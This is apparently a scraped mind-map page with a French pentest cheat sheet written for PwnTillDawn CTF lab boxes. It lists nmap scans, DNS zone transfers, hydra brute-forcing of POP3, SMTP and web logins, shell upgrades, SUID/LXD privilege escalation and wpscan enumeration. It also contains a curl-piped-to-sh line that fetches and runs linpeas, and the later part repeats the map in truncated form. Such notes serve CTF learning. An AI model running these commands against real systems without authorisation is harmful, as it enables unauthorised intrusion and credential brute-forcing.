Pwntilldawn Mindmap FULL

Sundance Design Issues

por Dan Hochee

Design Fields

por jared almoete

FSM Organization Plan v03.31.2015

por Patrick Curry

Vickie Hintz Computer links

por Vickie Hintz

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Sur l'host

chisel server -port 7777 --reverse

Subtopic

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator

nmap -sV -sC -T5 -p- ip

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

Other

grep -r pattern

search in files ( -recursive )

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

searchsploit

searchsploit -m chemin

searchsploit xxxx

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Metasploit

Upgrade session : sessions -u

Windows

Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

sudo python3 -m http.server port ( attaquant ) et wget

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress

Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u

Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters

python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération

Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms

Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit

searchsploit -m xxxxx

Depixelise

Unredactor

Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

The content covers various aspects of cybersecurity testing and exploitation techniques. It delves into network scanning with Nmap, including different flags and tools to automate scans.

Sundance Design Issues

Design Fields

FSM Organization Plan v03.31.2015

Vickie Hintz Computer links

Pwntilldawn FULL

Pivoting / Tunneling

Tunneling & Port Forwarding

Si on a un acces SSH

Web en écoute sur localhost

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator

nmap -sV -sC -T5 -p- ip

nmap -sV -Pn -p- -T5 ip

sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS

! AXFR !

Ajout dans /etc/hosts si besoin

SSH

Test de se co pour la bannière

Connexion si on a la clé privée

POP3

hydra -l operator -P wordlist.txt ip pop3

Mysql

mysql -h localhost -u sql_user -p

mysqldump -u root -p --all-databases > alldb.sql

FTP

Login anon à vérif

showmount -e IP

NFS

sudo mount -t nfs ip:/remote /local

sudo umount 10.150.150.59:/nfsroot

rpcinfo IP

SMTP

hydra -l operator -P wordlist.txt ipip smtp

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup

netstat -antup

Dumb shell upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

script /dev/null -qc /bin/bash

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Linux

Other

Find

Privesc

SUID

find / -perm -u=s -type f 2>/dev/null

searchsploit

searchsploit -m chemin

searchsploit xxxx

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Metasploit

Upgrade session : sessions -u

Windows

Shell

msfconsole

linpeas

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

sudo python3 -m http.server port ( attaquant ) et wget

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress

Bruteforce

Enumération users

wpscan --url https://www.hackinprovence.fr/ -e u

Check template et plugins vulnérables

PHP Filters